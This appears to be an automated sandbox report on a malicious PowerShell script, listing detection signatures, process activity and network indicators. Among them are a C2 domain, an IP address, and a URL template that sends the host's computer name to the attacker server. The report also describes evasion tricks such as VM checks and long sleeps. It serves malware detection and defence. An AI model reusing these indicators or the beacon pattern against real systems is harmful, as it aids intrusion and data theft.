Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1579001
MD5: 506d528176abebda1202676b0528e974
SHA1: 58036f821fad918c508ed11270e2df7474b3a2e3
SHA256: bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
Tags: KongTukeps1user-monitorsg

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 644, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 644, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:34:58.369189+0100 | 2859391 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 52452 | 1.1.1.1 | 53 | UDP

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 89.2% probability
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbGC source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbllu8w source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData

Networking

Source: Network traffic; Suricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.7:52452 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: global traffic; HTTP traffic detected: GET /4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
Source: powershell.exe, 00000000.00000002.1430090401.00000235E9190000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.e
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.i
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/year
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gif
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemin
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC487E56
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC488C02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC480B6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC6C6D1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC6C7CFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC6C3589
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2chukqj.1ra.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
